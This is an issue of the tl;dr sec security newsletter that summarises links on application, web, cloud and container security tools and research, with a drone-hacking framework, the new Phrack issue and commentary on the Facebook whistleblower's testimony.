• tl;dr sec
  • Posts
  • [tl;dr sec] #104 - New Phrack, Often Missed Web Vulnerabilities, Facebook Whistleblower

[tl;dr sec] #104 - New Phrack, Often Missed Web Vulnerabilities, Facebook Whistleblower

New issue of Phrack, 10 often missed web vulnerabilities, Facebook whistleblower comes forward about the dangers of its products.

Hey there,

I hope you’ve been doing well!

Tell me X without X

A trend on Twitter is to say something like “Tell me you work in security without telling me you’re in security.”

Sometimes the threads are fun, sometimes I find them tiring.

But! I did come across this epic burn by Matt Stratton:

For context, Travis CI was bought by a private equity firm, laid off a number of senior engineers, and discontinued their free tier for OSS projects.

To be honest I feel bad about including this, because Travis was/is a truly trailblazing company and great product. Perhaps this is an example then of the value of running DevRel-y content past developers before posting.

Anywho- I’ll have an exciting update next week, stay tuned! 😎

Sponsor

📢 The DevSecGuide to Infrastructure as Code

🔬 Research on the state of IaC security

🦋 Practical steps for embracing a DevSecOps culture

🔐 Tips for embedding security throughout the DevOps lifecycle

📜 In this newsletter...

  • AppSec: Semantic search tool for C and C++, how Yandex does SAST, how to use GitHub Actions securely

  • Mobile Security: Decrypt iOS apps using r2frida

  • Web Security: 10 often missed web vulnerabilities, finding prototype pollution at scale

  • Cloud Security: Query your cloud environment via GraphQL, tool to analyze CloudFormation templates using IAM Access Analyzer, common API for AWS services, handling ransomware on AWS whitepaper, comparing R2 and S3

  • Infrastructure as Code: Interactive Terraform visualizer, infra as code for AWS orgs

  • Container Security: Verify container signatures in Kubernetes using Notary or Cosign, tool to configure k8s resources into re-usable supply chains

  • Red Team: Tool for hacking drones, new Phrack issue

  • Misc: How Jackie Chan does action comedy, stop motion Darth Vader

  • Facebook whistleblower: Tells Congress Facebook's products hurt kids and weaken democracy

AppSec

googleprojectzero/weggli
A fast and robust semantic search tool for C and C++ codebases designed to help security researchers identify interesting functionality in large codebases, by Google Project Zero’s Felix Wilhelm.

Company Wide SAST: How we do SAST at Yandex
ZeroNight talk by Yandex’s Evgenii Protsenko et al discuss the orchestrator they build to unify their SAST tools and how they write custom rules for Semgrep and CodeQL.

Protect Your GitHub Actions with Semgrep
r2c’s Grayson Hardaway gives a great overview of how GitHub Actions can be insecure and the impact (stealing secrets, backdooring the repo). There’s actually a number of unexpected subtleties here that was interesting to read.

He’s also released a free Semgrep ruleset you can use to easily audit your GitHub Actions, and a demo repo if you want to practice these exploitation scenarios.

If you want to up your GitHub Action security game, this is probably one of the best posts I’ve seen in this space.

Mobile Security

as0ler/r2flutch
Yet another tool to decrypt iOS apps using r2frida, by @as0ler.

Web Security

10 Types of Web Vulnerabilities that are Often Missed
Nice overview by Hakluke and Farah Hawa. HTTP/2 smuggling, XXE via Office open XML parsers, SSRF via XSS in PDF generators, XSS via SVG files, blind XSS, web cache deception, web cache Poisoning, h2c smuggling, second order subdomain takeovers, postMessage bugs.

Exploiting Client-Side Prototype Pollution in the wild
Great work by Sergey Bobrov, s1r1us and others in finding prototype pollution issues at scale. The post has some useful methodology tips and links to various tools and other resources. They found 18 vulnerable libraries, reported ~80 bugs to vulnerability disclosure programs, and overall found more than 1,000 vulnerable websites.

We’ve found that 80% of nested parameter parsers are vulnerable to prototype pollution.

Cloud Security

cloudgraphdev/cli
CloudGraph is an open-source GraphQL powered search engine that makes it easy to query your cloud infrastructure and configuration so that you can solve a host of complex security, compliance, and governance challenges.

Validate IAM policies in CloudFormation templates using IAM Access Analyzer
AWS’ Matt Luttrell introduces IAM Policy Validator for CloudFormation (cfn-policy-validator), an open source tool that extracts IAM policies from a CloudFormation template, and allows you to run existing IAM Access Analyzer policy validation APIs against the template.

AWS Cloud Control API, a Uniform API to Access AWS & Third-Party Services
Cloud Control API is a standard set of APIs to Create, Read, Update, Delete, and List (CRUDL) resources across hundreds of AWS Services and dozens of third-party services. Basically, instead of having different naming conventions across services, you have common verbs like CreateResource, GetResource, etc.

Introducing the Ransomware Risk Management on AWS Whitepaper
AWS’ Temi Adebambo announces a whitepaper that aligns the NIST recommendations for security controls related to ransomware risk management for workloads built on AWS. The whitepaper maps technical capabilities to AWS services and implementation guidance.

  • Who could benefit from switching

  • What would stop ideal customers from adopting R2

  • Who is better served by other providers

  • What we still don’t know about R2

Infrastructure as Code

im2nguyen/rover
Interactive Terraform visualizer. Explore the relationships and dependencies between various Terraform resources.

org-formation/org-formation-cli
An Infrastructure as Code (IaC) tool for AWS Organizations.

Container Security

Verify Container Signatures in Kubernetes using Notary or Cosign
Christoph Hamsen discusses v2.0 of Connaisseur, an admission controller to integrate container image signature verification and trust pinning into a Kubernetes cluster. v2.0 adds support for multiple keys and signature solutions.

Announcing Cartographer
“Cartographer allows users to configure Kubernetes resources into re-usable supply chains that can be used to define all of the stages that an Application Workload must go through to get to an environment,” by @OssCartographer.

Red Team

dhondta/dronesploit
A CLI framework gathering hacking techniques and exploits especially focused on targeting drones, by Alexandre D’Hondt.

Phrack #70
New Phrack! A number of neat technical articles, as always, including: attacking JavaScript engines, VM escapes, .NET instrumentation, decoding an iOS kernel vulnerability, hypervisor bugs, a discussion of the YouTube security scene and Shellphish’s submission to the Cyber Grand challenge, an automatic vulnerability exploitation and patching event held by DARPA.

Misc

Jackie Chan - How to Do Action Comedy
Since I was young, I’ve been a huge fan of Jackie Chan’s movies. I really enjoyed this breakdown of shot and editing choices as well as Jackie’s willingness to do hundreds of takes to make things perfect.

Moving Darth Vader’s Force FX Lightsaber in Stop Motion
Darth Vader playing with his pet AT-AT, pretty cute.

Facebook’s products “harm children, stoke division, weaken our democracy and much more,” Frances Haugen, the former Facebook employee who leaked tens of thousands of pages of internal documents.


From Frances Haugen’s ~13min 60 Minutes interview:

The thing I saw at Facebook, over and over again, is there were conflicts of interest between what was good for the public and what was good for Facebook. And Facebook over and over again chose to optimize for it’s own interests, like making more money.

Person after person after person has tackled this inside of Facebook, and ground themselves to the ground.

To quote from one of the internal resources she shared:

“We have evidence from a variety of sources that hate speech, divisive political speech, and misinformation on Facebook and the family of apps are affecting societies around the world.”

Fascinatingly, apparently EU politicians reached out to Facebook after it’s 2018 algorithm change, and said they:

…feel strongly that the change to the algorithm has forced them to skew negative in their communications on Facebook… leading them into more extreme policy decisions.

So politicians feel like they have to change their messaging and adopt more extreme positions to get competitive levels of engagement on Facebook.

I’m going to repeat that because it’s crazy: a social media company’s algorithms are directly impacting political rhetoric and positions, and thus the direction of nations.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint